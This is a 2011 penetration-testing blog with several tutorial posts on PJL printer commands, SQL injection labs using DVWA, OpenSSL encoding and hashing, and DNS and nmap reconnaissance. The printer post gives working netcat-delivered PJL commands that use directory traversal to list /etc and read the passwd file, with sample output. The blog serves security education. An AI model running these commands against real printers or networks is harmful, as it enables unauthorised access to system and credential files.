Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write up is about knowing and understanding the basics. A long time ago, you became a “hacker” because you were someone who was an expert in a subject.
I know people that have forgotten more about VMS than I could ever learn. They became known as a VMS “hacker” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about and being able to manipulate those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate, since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve not doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has, since, officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PC’s, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested (later in this article), showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain).
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • HTTPS
  • Telnet
  • SNMP
  • PCL / PJL
HTTP and HTTPS, is served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. Ok, maybe not most, but those that have an understanding about security know that HTTPS is better than HTTP, so they usually turn off communications on Port 80, in favor of Port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the password is usually the same using Telnet, as it is using EWS. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later.).

But what’s interesting is PJL – the Printer Job Language – an extension of PCL (the Printer Command Language – how print jobs are communicated to printers) is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, supports the ability to password protect it (with a separate password from EWS/Telnet) so you can actually protect the printing stream (a little). The following examples, however, were successfully implemented on an HP printer without PJL password being set. But, let’s face facts, nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character. I highly suggest you use Notepad++ in order to craft the ASCII commands. Regular Notepad just won’t cut it.  And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). This will send the commands in a “raw”, unadulterated way so the printer will interpret the commands correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” do that is:

[ESC]%-12345X @PJL RDYMSG DISPLAY="Igor!!!!"
[ESC]%-12345X

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to perform the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading:



Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t?) we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999
[ESC]%-12345X

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
. TYPE=DIR
.. TYPE=DIR
hp TYPE=DIR
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247

Using the PJL commands to interact with the Filesystem is not a hack, it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000
[ESC]%-12345X

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23
root::0:0::/:/bin/dlsh

Conclusion
Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with the printers. If you want to learn more about PJL commainds, go ahead and google “PJL reference manual”, you’ll get a number of hits listing out PDF’s containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion and your expert knowledge in this subject should help you educate others who may not quite understand the claims that are being made regarding the vulnerability of HP Printers.

Sunday, November 6, 2011

Security vs. Compliance: When is Too Little Not Enough?

We’ve talked a bit about offensive type security: knowing how to attack a system is all well and good. Most penetration testers should know as many of the different ways an attacker can penetrate a system so that they can help build defenses used to slow down the bad guys. This is an integral aspect to Information Security and one that we focus on here at “Hack On A Dime” very much.


However, there’s more to Information Security than just knowing how to attack and defend. Management worth their salt should be able to view their enterprise and be able to visualize how their security plan (as a whole) protects their network. This skill is something that’s crucial to being able to adapt to new technologies and still protect information. And it’s one of the skills that I and my team pride ourselves on building up over the past few years of working together.

Recently, I had a conference call with a client regarding one aspect of Information Security Management: software baselines & procedures. The client was assigned the task of reviewing current procedures for building servers. They had outlined settings that, when a system administrator would build a new RedHat Enterprise Linux 6 server, the admin would follow these procedures to build a server that is compliant with current standards. I say “compliant with current standards”.

It is this aspect of Information Security Management that provides a foundation for being able to provide measurement to vulnerability exposure. Notice how I didn’t say it provided metrics to how secure you are. Why not? Because it doesn’t. Being able to provide visibility to your exposure window for certain vulnerabilities is only one part of an all-encompassing Information Security plan.

This conference call shed light on one of the most erroneous aspects of Information Security mis-management and it’s a topic I thought you, as a penetration tester, and future Information Security Management member, might benefit from hearing about.

Compliance and Standards

The client started the conference call by displaying to all on the call their web-based standards application and first going over some of the more “stringent” standards that they’d drafted up.

And it is here where I, as a consultant, needed tread lightly, because here, as the saying goes, there be dragons. Because the “stringent” standards the client boasted about did, in fact, contain strong terms such as “users will implement encrypted protocols such as ssh or sftp” and yet, at the same time, it contained such wishy-washy terminology as “when the infrastructure can support it”. It was wishy-washy-ness such as this that gives the very human system administrators and users a way out of any restrictions the standards may dictate.

Therefore, restrictions has lost their teeth. The Standards are no longer enforceable by any party that should be given the role of enforcer. No auditor, no management can easily enforce these standards if the rule itself contains a phrase that states “you must do this” … “if you can”. Because the user will claim they can’t. Always.

And yet, I remained quiet. After all, they are the client and the client is always right.

Putting aside the “wishy-washy” verbiage with which the client’s Standards were crafted, let’s look at what they actually state. The client was required to be compliant with Payment Card Industry Data Security Standards or PCI-DSS. The client’s Standards & Policies reflected their desire to be compliant with the PCI Data Security Standards. The restrictions that the Standards dictated, demonstrated a desire for their systems to be less wild and insecure and more in line with other systems that are compliant with PCI DSS requirements.

While the task at hand was to review the procedures to build new servers and ensure they are still compliant with PCI DSS requirements, I, as an experienced security expert, saw that while the procedures did a good job of mapping out compliance to the PCI DSS requirements, it nagged at my very being that what was being laid out for this client as a baseline for building secure servers, was, in fact, a minimal set of security settings, at best.

“Real World” Security vs “Just Okay” Compliance

The client’s standards spoke of setting warning banners to proclaim loudly, “Attacker! This computer is not your computer! By accessing it, you may be prosecuted!”. The client’s standards spoke of turning of telnet and FTP (unencrypted protocols that any network sniffer could capture) and ensuring that use of SSH and SFTP (encrypted protocols) was turned on.

However, basic “real world” security settings were completely and utterly ignored. For instance, it isextremely well known that SSH version 1 has many vulnerabilities, it is a basic “real world” defense to configure all SSH servers to explicitly forbid fallback to SSH V1 communications. This is a quick setting that would take a moment to configure on any current SSH server.

So, for all the loud proclamations via setting a warning banner, nearly every server that answers SSH, allows a client to “downgrade” their communications to SSH V1. So, very nearly all their SSH servers were vulnerable to attack via exploits that were over ten years old.

When is Too Little Not Enough?

In this conference call, I brought up to the client the fact that their “stringent” Standards were somewhat lacking in their strength when it came to “real world” security. Very gently, I illustrated a few of the settings that the Center for Internet Security outlines in their SecurityBenchmarks and asked if the client wanted myself and my team to review the procedures for compliance and at the same time, review the CIS Security Benchmarks to produce for them a list of deltas that could be implemented to bring their baseline procedures up to a more secure plateau.

I was told “thank you, but no.”

And herein, lies the problem with most corporate security plans. This is the crux of why even the most “secure” facilities fall prey to attackers. Why do corporations who should know better get hacked on a nearly monthly basis? Because the corporate sector touts how “secure” they are by confusing the concept of security with the concept of compliance.

The two things are so incredibly diverse, as to be very nearly two separate thought processes.

Conclusion

What Information Security Management should realize is this simple concept: Being compliant with regulations and requirements should be a by-product of implementing a good, strong, security plan. All corporate entities should do the most they can to implement strong security and ensure that a subset of THAT security provides compliance with regulations.

Unfortunately, too many corporations ensure that they have done the least they can possibly do (the utmost minimal) to be compliant and constantly ignore the challenges they need to overcome to be truly as defensive as they possibly could when it comes to security.

If you’re going to be entering into the Information Security Management realm, understand that you need to be the preacher when it comes to implementing security over compliance.

Saturday, July 30, 2011

Scanning an Internal Network Through A Firewall

OK - so this post's a quickie because a) the last 2 posts have totaled nearly 12 pages of source material and I need to focus on the new novel this weekend and b) it's so early on a Saturday morning that I've yet to grab a mug of "Jamaica Me Crazy" coffee yet. Thoughts aren't quite as coherent without Java. 

So here goes:

I stumbled across these posts this morning and while I haven't yet had time to try it, the write up seems solid.

According to this article, there are 2 new ways to implement an Idle scan (or variations of an Idle scan) in order to enumerate targets ON THE INSIDE of a firewall. This means that we, the attacker, don't have to be able to route to the victim/target in order to enumerate ports. The zombie we pick is the one that has to route, so in some cases, that can be the firewall or outlying router itself.

Are the terms "zombie" and "victim" not all that familiar to you? Don't quite remember what an "Idle scan" is? No problem.

Get caught up on traditional Idle scans here: http://www.networkuptime.com/nmap/page3-16.shtml

Then, check out this white paper detailing the 2 new ways to Idle scan here: http://people.csail.mit.edu/costan/readings/usenix_papers/Ensafi.pdf

And, just in case your head is spinning from that and you need the breakdown, check out this blog entry (http://www.malwarecity.com/community/index.php?app=blog&module=display&section=blog&blogid=23&showentry=7600) where MalwareCity has taken the time to explain them. 

Personally, I think scan #2 (SYN cache scan) is the way to go because the first option is dependent on having a FreeBSD box in the victim/target's DMZ or at least in the victim/target's external IP space. Chances of that are not exactly tiny, but they are limited. And why limit yourself when you have the option to use the SYN cache scan?


Friday, July 29, 2011

Browbeating Web Apps W/Their Own Javascript

We’ve talked a bit about reconnaissance, NMAP and SQL Injection. But sometimes, our jobs aren’t strictly limited to demonstrating how vulnerable an application is to known exploits. Sometimes, we get the chance to demonstrate how vulnerable a web application is just by existing.
An administrator or developer can put in defense after defense and make it so we have to jump hoops in order to get to known exploits and that’s good. Defense-in-depth is a great concept and it should be used as a building block of any sound security plan. However, if we can develop an understanding of how an application works well enough (and I mean mind-melding like Spock with that rock creature—you know, the one with the silicon eggs *shudder* ), if we can really get to know an app and understand the code in front of us in a web page, then we should be able to test its security without some of the tools we’ve talked about before.
I’m going to demonstrate how, with the help of a web proxy, we can manipulate an application’s code so much so that we can see information we weren’t supposed to see, gain administrative privileges, even dump a database.
Now, all you critics out there, these are extremely basic examples of how to manipulate javascript and HTML to get us escalated access to data. These are not meant to be elaborate examples, by any means and they aren’t.
But they should serve as a great stepping stone for your education and give you a place to start to learn how to do this.

Ready to begin?

The Web Application

The following examples, while simplistic of nature, are real. They have been found out in the field. I can’t divulge where, but I can divulge how to exploit these loops of logic.

Javascript in the URL bar

Now, there are a couple of different ways to skin this particular cat. Some people would take the resulting URL from this particular manipulation and just copy and paste it into a new browser window and change the URL. This is ordinarily a fine idea. However, SOMEtimes you find a sneaky programmer who has figured out that they need to deny direct URL access if it wasn’t the result of a Javascript call. So, the only way to do this particular trick is by manipulating the javascript that we are given in the first place.

First, we log into our Web Application (a management portal, for this particular example) and we are presented with this screen:



Thursday, July 21, 2011

Trying SQL Injection on Your Own

Hey, if after our last couple of posts, you feel like your SQL fu is up to snuff and want to get your hands on a real vulnerable web app that maybe doesn't have the answers all leaked out, then check this out.


Head on over to  http://csis.pace.edu/~lchen/sweet and download the vulnerable app they're hosting in VM or Virtualbox format. Stand up that server and follow these two guides, 5 - Security Testing and 6 - Vulnerability Management .

The Ubuntu web server is running BadStore, which you can alternately register for and download here: http://www.badstore.net  Either way, you're going to be able to run SQL Injection and XSS vulns against this web app and database.

Try it out!

Wednesday, July 20, 2011

Manual SQL Injection without Tools


Last post, we stood up a VM with Damn Vulnerable Web App and used an automated tool, sqlmap, to audit the vulnerable URL and gather up data for us from the database that we ordinarily shouldn't be privy to.

 

This time around, I wanted to talk about basic SQL queries and how they are used in legitimate applications. And then later on, I wanted to build on this to demonstrate to you, the reader, what we can do without automated tools. We'll roll up our sleeves and grab a wrench and jam it into a keyhole to gather data from the database.
One thing I feel I must get off my chest: A lot of people want to learn how to hack. And the simple fact of the matter is: you can't. You can't learn to hack anything. The reason there are great hackers out there is because they became such experts in a particular topic or topics that they knew every which way to use, abuse, torture and amuse a system. If you check out Darknet's site, they've posted their motto: “Don't Learn to HACK – Hack to LEARN”. This is the truest statement I can offer you, the reader. In order to be one of the best hackers, you need to know everything you can about a subject. Will you ever know everything about that subject? Unlikely. I consider myself a UNIX/Linux expert and I learn something new nearly every day. (Albeit, I learn mostly because I've pounded the keyboard and found some new key combo I never knew existed till I got mad but whatcha gonna do? :) )
I don't expect you to become an expert overnight but hopefully this introduction will solidify a few database concepts for you about how legitimate SQL queries help lead to SQL Injection.
Ready to begin?


SQL Queries – Building the SQL Database
To demonstrate to you how SQL queries work, I thought it would be best to illustrate some simple queries first.
To do this, we'll need a mysql server and a mysql client. Luckily, if we're using Ubuntu, these utilities are never far away. Run the following command to install mysql and then we'll start creating databases.
sudo apt-get install mysql-server mysql-client-core-5.1
During install, you may be asked to provide a password for the root user to access the database. Don't use your normal password or the password you used to set up root's account in the OS, if you've done that. Just set up a fairly secure password that you'll remember later. Why? Cuz you'll need it. Trust me.
Once you're installed, go ahead and connect to the mysql server by issuing the following command at the command prompt:
user@workstation:~$ mysql -h localhost -u root -p
Enter password:
(you will be brought to a mysql prompt like so)
mysql>

Monday, July 18, 2011

Sqlmap Introduction – SQL Injection Walkthrough


In prior posts, we've discussed performing reconnaissance work on targets. We've talked about using FOCA, Maltego and other tools (including some that simply query how the Internet works) and how to gather information from targets about them.


Starting today, we're going to discuss the practical application of some more technical tools. Tools that will provide for us information on targets that will help us determine what our attack vector is going to be for that target.

In this particular write up, we're going to explore the specifics of finding a web application and determining if it's vulnerable through SQL injection. Once we determine that it is, indeed, vulnerable, we're going to use an automated tool called “sqlmap” to help us gather data from the database. I think it's important to also discuss how to manually get to the same point, but that's for another blog post. We'll follow up and show you manual SQL injection in our next post.

So you can follow along at home, let's talk a little about what I've got set up in my lab and where to get the software I'm using.

Setting Up The Lab – Vulnerable Web Application
Now, in order to test a web application for vulnerabilities, you're going to need to deploy a vulnerable web application.

Come back to this blog when you've written up a nice PHP/mysql web application that is chock full of vulnerabilities for us to exploit. Go on, I'll wait.

What's that? You don't feel like writing your own web application just so you can test it later? Fine.

Lucky for us, there are plenty of folks who have done just that so that we don't have to. The Internet has dozens of bootable Linux distributions out in the world that provide for us, the security researcher, the hacker, call-us-what-you-will, an environment that contains vulnerable applications. All we need to do is grab one, boot it up and start testing away.

For my lab, I settled on “Damn Vulnerable Web Application”, which you can find more info on at their web site (http://www.dvwa.co.uk/) and you can download an ISO file of the bootable web app here: (http://www.dvwa.co.uk/DVWA-1.0.7.iso).

You can either burn that ISO file to CD and boot up a physical host or you can create a Virtual Machine in either VMWare Player or VirtualBox and have it boot up that way. In either virtual machine software, you can create a machine with a handful of RAM (say 512 or 1GB) and no hard disk. And then define it to use the ISO file you downloaded for boot. Then you've got a Virtual Machine that's booting a CD/DVD (LiveCD).

Once you've got that set up and running, make sure you know what IP address the machine is (so you know what target you're supposed to be hitting) and then it's to start scanning!

Wednesday, May 18, 2011

… And Today I Learned Something Cool About OpenSSL

Maybe most of you reading this knew this but I have to admit that I did not. I was reading the WEB SECURITY TESTING COOKBOOK by Paco Hope and Ben Walther and came across a snippet of code where they show that you can use openssl to generate a Base64-encoded blob of data.

I did not know that you could do this with OpenSSL. I also didn’t know that it could do a lot more than that in the encoding/decoding realm.

Check it out:

Decoding a Base64-encoded string


This is why I love using Linux when testing systems. A simple command line can be used over and over again to perform various tasks. Multi-use is key here.

So, let’s say you come across a Base64-encoded blob of data and you want to decode it. Sure, there are plenty of online decoders out there.

Let’s say the blob of data is:

QWRtaW5pc3RyYXRvcjpwYXNzd2QK

Let’s decode this using openssl:

user@host:~#  echo “QWRtaW5pc3RyYXRvcjpwYXNzd2QK” | openssl base64 –d

What do you get?

“Administrator:passwd”

Congratulations! You’ve successfully decoded a username/password pair.

Encoding a Base64-encoded string

Now, let’s say you wanted to be able to manipulate a base64-encoded blob of data and substitute your own information into it. This would entail you encoding your data for insertion. OpenSSL helps there, too.

Let’s say, instead of the username/password pair we discovered up above, we wanted to somehow include our own in that blob of data. Let’s say we wanted to take “Charlie:Winning” into the blob and we need to base64-encode it.

Our data:

“Charlie:Winning”

Encoding it:

user@host:~#  echo “Charlie:Winning” | openssl base64 –e

It will return the following:

Q2hhcmxpZTpXaW5uaW5nCg

We can then paste this into wherever we’re using that base64-encoded data and we’re ready to rock.

Generating  Hashes

Now, let’s say you wanted to be able to generate an MD5 hash of a value, for use in web testing. If you had a value (let’s say “Charlie:Winning” again … ) and you needed to calculate an MD5 hash of that value to append to a string being submitted to a web server, you can accomplish this with OpenSSL, as well.

Generating  an MD5 Hash

Our value:

“Charlie:Winning”

Our command to generate an MD5 hash from it:

user@host:~#  echo “Charlie:Winning” | openssl dgst –md5

The result:

428a9b9b18360150aadfe3480189a1f8

Generating  a SHA-1 Hash

You can use the same command, changing the digest being used (from –md5 to –sha1) to generate a SHA-1 hash.

Our value:

“Charlie:Winning”

Our command to generate an MD5 hash from it:

user@host:~#  echo “Charlie:Winning” | openssl dgst –sha1

The result:

23d7fc7c0819c20d0e83d88bb142537e8f87cc6c

Conclusion

OpenSSL has a thousand different uses and you should try to become as familiar with it as you can. I never realized how many cool things it can do and was always looking around for different tools to perform all these functions above.

Now I know I don’t need all those tools. I’ve got one tool that handles all of that for me.

Sunday, May 15, 2011

Information Gathering using NMAP (and other tools)


That's right. You read that correctly. NMAP, the world's leading port scanner and one of the few tools that should be in every single tester's toolkit, can help you determine a lot of information regarding a target. Host discovery, my friends. NMAP can help you discover lots of information about the hosts on the outward-facing interfaces of a network.


And it does all this without touching the hosts in question.

That's right. You can perform lots of recon with nmap without slinging a single packet at the target hosts.

Previously, we've discussed using Maltego to determine host information (IP's, owner information, etc). Now we're going to do the same from the command line (and do it a might bit quicker, too). But first a little history ...

Setting the Wayback Machine to 199x


The Internet runs mainly because a service, provided by Domain Name System (DNS), translates “friendly names” (like “www.google.com”) to IP addresses (74.125.91.106) and then routes packets around networks until they reach the proper destination. Kind of in the way a phone book translates a “friendly name” like “Bob Smith” to his phone number (212) 555-1212, so you can call him.

Now, that's an overly simplified depiction of the situation, but it works for the purposes of background to our nmap story.

DNS Records

DNS is a fairly easy system to follow along with, even if you're fairly new to Information Technology. DNS simply holds and retrieves records about specific servers in your network range. Typically, it holds the following types of records:

  1. MX Record – Mail Exchange Record – this record indicates what servers are designated as your mail servers
  2. NS Record – Name Server Record – this record indicates what servers are designated as your DNS servers (typically open for UDP 53, at the very least)
  3. A Record – Address Record – this record maps a domain name (or sub-domain name) to an Ipv4 address
  4. AAAA Record – Address Record – this record maps a domain name (or sub-domain name) to an Ipv6 address
  5. SOA Record – Start of Authority Record – defines global parameters for a zone (domain) – it can define what server is your primary name server (DNS server)
  6. CNAME Record – Canonical Name Record – defines a server's canonical name, rather than any of the aliases it may have within the domain
  7. PTR Record – Pointer Record – provides information for Reverse DNS (see below) – also, has become an “authoritative” way to determine spammers around the Internet
  8. SRV Record – Service – provides information for specific services, such as SIP and XMPP (that's right, Jabber/GTalk). For some in-depth information on SRV records and their structure, please take a look at: http://en.wikipedia.org/wiki/SRV_record
Interesting note: MX and SRV records must point to an address record (A or AAAA record) .
Reverse DNS

Reverse DNS performs the exact same service, only in reverse. Reverse DNS lookups (rDNS) determines the domain name (“friendly name”) that is associated with a given IP address.


Using Nslookup

For years, nslookup was the defacto standard tool with which to interact with DNS servers and glean information. However, in recent years, this has been shown to be a flawed tool with problematic results. A detailed write up can be found here (
http://homepage.ntlworld.com/jonathan.deboynepollard/FGA/nslookup-flaws.html) , but the long and short of it is that:

  1. nslookup performs hidden queries
    If you are trying to perform reconnaissance work, you want to be as quiet as possible. By performing hidden queries, nslookup is not exactly a “quiet” utility. In fact, it's rather noisy.
  2. nslookup uses its own internal DNS client
    Also when performing recon work, you want to ensure the data you're getting in return is accurate. When put up against standard DNS utils, it has been found that nslookup's returned data was inaccurate. This means that, in the long run, you can't really and truly trust what you're seeing from nslookup.

What, then, is a poor pen tester to do?

Use “dig” and “host”, of course. (And nmap, too)

Using host
For in-depth guidance on how to use host, check out their man page here: http://linux.die.net/man/1/host
But let's say, for just a moment, that you wanted to use the “host” command to query a zone for all the name server (ns) records. You would want to use the following command:

host -t ns domain

and let's say you also wanted to query for all the mail server records (mx)

host -t mx domain

and let's say you wanted to … well, you get the idea, right? Just pass a “-t” parameter and use the abbreviation for the type of record you want to retrieve.

host -t srv domain

will provide you with all the SRV records for the domain or sub-domain.

So, for an example, I ran the host query against ISC.org (the CISSP organization):

user@host:~$ host -t mx isc.org
isc.org mail is handled by 10 mx.ams1.isc.org.
isc.org mail is handled by 10 mx.pao1.isc.org.

and then I wanted to find their name servers:

user@host:~$ host -t ns isc.org
isc.org name server ns.isc.afilias-nst.info.
isc.org name server ams.sns-pb.isc.org.
isc.org name server ord.sns-pb.isc.org.
isc.org name server sfba.sns-pb.isc.org.

As you can see from the above, you can very quickly begin to piece together your target hostnames from using the information displayed from these commands.

Now, if you want to perform a zone transfer (with host, you can use any one of a number of utils to do this) and grab all the records for yourself, then what you want to do is the following:

host -l domain or host -l -v -t any domain

Both of these will attempt a zone transfer and give you all the host records or all the
records (as a whole) for the zone

Using dig
dig has a lot of switches and parameters you can use to customize its output, but for some in-depth guidance, you can check out dig's man page here: http://linux.die.net/man/1/dig

However, it is most important for you to remember to add on the “+answer” to any dig lookup.

For instance, let's say we wanted to use the dig command to find information about the MX records for “isc.org”. We would want to issue the following query:

dig isc.org MX +answer

This will print out the following output:

user@host:~$ dig isc.org MX +answer
; <<>> DiG 9.7.3 <<>> isc.org MX +answer
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43599
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;isc.org. IN MX
;; ANSWER SECTION:
isc.org. 7200 IN MX 10 mx.pao1.isc.org.
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
;; Query time: 87 msec
;; SERVER: 167.206.245.129#53(167.206.245.129)
;; WHEN: Sun May 15 09:35:31 2011
;; MSG SIZE rcvd: 73


A lot of stuff to sort through, I know! However, if you step back a bit and just take it one piece at a time, you can sort through this easily.

First off: there's a lot of comments. And those comments can be trimmed out by passing dig the “+nocomments” parameter. That would get rid of this part of the output:

; <<>> DiG 9.7.3 <<>> isc.org MX +answer
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43599
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

Then, you probably want to get rid of that last section as well the part that reads like this:

;; Query time: 87 msec
;; SERVER: 167.206.245.129#53(167.206.245.129)
;; WHEN: Sun May 15 09:35:31 2011
;; MSG SIZE rcvd: 73

This is the “stats” section and can be trimmed from the output of your dig command by passing dig the “+nostats” parameter.

So, really, if we wanted to boil the dig output down to something fairly easy to read we would issue the following command:

dig isc.org MX +nocomments +answer +nostats

and get back:

; <<>> DiG 9.7.3 <<>> isc.org MX +nocomments +answer +nostats
;; global options: +cmd
;isc.org. IN MX
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
isc.org. 7200 IN MX 10 mx.pao1.isc.org.

Easy peasy, no? We now get back very useful output.
We see our query:
;isc.org. IN MX

and the answers we wanted:
isc.org. 7200 IN MX 10 mx.ams1.isc.org.
isc.org. 7200 IN MX 10 mx.pao1.isc.org.

Dig can be useful and helpful to a pen tester and can even be used to perform a zone transfer, as well. And we all know what happens if you successfully transfer the zone? Right, you get all the host records for a domain. And what protocol does that use on port 53? Right, TCP. Where most queries use UDP, Zone Transfers use TCP.


Using nmap (with other tools) for Information Gathering
Most of us know that nmap is the most awesome port scanner on the planet. So awesome (read: useful) that there is no other I use. I know, I know. There's utilities like “amap” and “LANguard” and a slew of others. I get it. Just like the different editions of the STAR WARS movies, they all have their uses. However, if you're done preaching religious differences (yes, Han shot first, we all know that), let's all settle down, take our seats and talk about the only port scanner that matters: nmap.

Yes, you can use it to perform a wide array of scans and perform host discovery through active scanning.

However, you might not know that you can use nmap to perform list scanning, which never touches the target box. This kind of scan helps you, the pen tester, in gathering information about a target.

You can start by using “host” and “dig” to get an initial set of hosts/IPs to begin your data mining.

So, using the examples above, we know the following:
QUERY: dig isc.org MX +nocomments +answer +nostats


ANSWER: isc.org. 7200 IN MX 10 mx.pao1.isc.org.

So, we can then further “dig” for:

QUERY: dig mx.pao1.isc.org +nocomments +answer +nostats

ANSWER: mx.pao1.isc.org. 3600 IN A 149.20.64.53

So, now we have an IP address. Using the “whois” command, we can determine the network block of IP's that this server is contained in.

QUERY: whois 149.20.64.53

ANWER: user@host:~$ whois 149.20.64.53
#
# Query terms are ambiguous. The query is assumed to be:
# "n 149.20.64.53"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=149.20.64.53?showDetails=true&showARIN=false
#
NetRange: 149.20.0.0 - 149.20.255.255
CIDR: 149.20.0.0/16
OriginAS:
NetName: ISC-NET3
NetHandle: NET-149-20-0-0-1
Parent: NET-149-0-0-0-0


We now know that isc.org owns 149.20.0.0 – 149.20.255.255 or in CIDR notation 149.20.0.0/16.

We can use this particular information to feed into nmap and have nmap perform a reverse DNS lookup. This reverse DNS lookup will determine what IP's are useful to use to start active scanning (if that is what we wish). Or we can use the information gleaned from nmap to start doing targeted queries of ports.

A list scan is an unobtrusive way to gather information to help you choose individual machines for targeting later.

So, let's use nmap now to perform a list scan of isc.org.

user@host:~$ nmap -sL isc.org/16

Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 10:44 EDT
Nmap scan report for test-test-test.isc.org (149.20.64.1)
Nmap scan report for res1.sjc3.isc.org (149.20.64.2)
Nmap scan report for sfba.sns-pb.isc.org (149.20.64.3)
Nmap scan report for dlv.sfba.sns-pb.isc.org (149.20.64.4)
Nmap scan report for 149.20.64.5
Nmap scan report for 149.20.64.6
Nmap scan report for 149.20.64.19
Nmap scan report for bind.odvr.dns-oarc.net (149.20.64.20)
Nmap scan report for unbound.odvr.dns-oarc.net (149.20.64.21)
Nmap scan report for iana-testbed.odvr.dns-oarc.net (149.20.64.22)
Nmap scan report for 149.20.64.23
Nmap scan report for 149.20.64.24
Nmap scan report for sie.isc.org (149.20.64.25)
Nmap scan report for tools.isc.org (149.20.64.26)
Nmap scan report for zfa.sie.isc.org (149.20.64.27)
Nmap scan report for 149.20.64.28
Nmap scan report for 149.20.64.29
Nmap scan report for 149.20.64.30


So, as you can see, nmap has performed rDNS lookups on a number of hosts in the range and we now know a lot more hostnames than we did before. Now, we can start to infer uses and other information from the host names.

CONCLUSION
By using a combination of some simple tools, we, the pen tester, can quickly produce information about a target network that will become useful to us for more targeted attacks. If there's a point where you are hired to perform a pen test and the customer wants you to have absolutely zero information beforehand, these techniques are extremely useful for getting a starting point.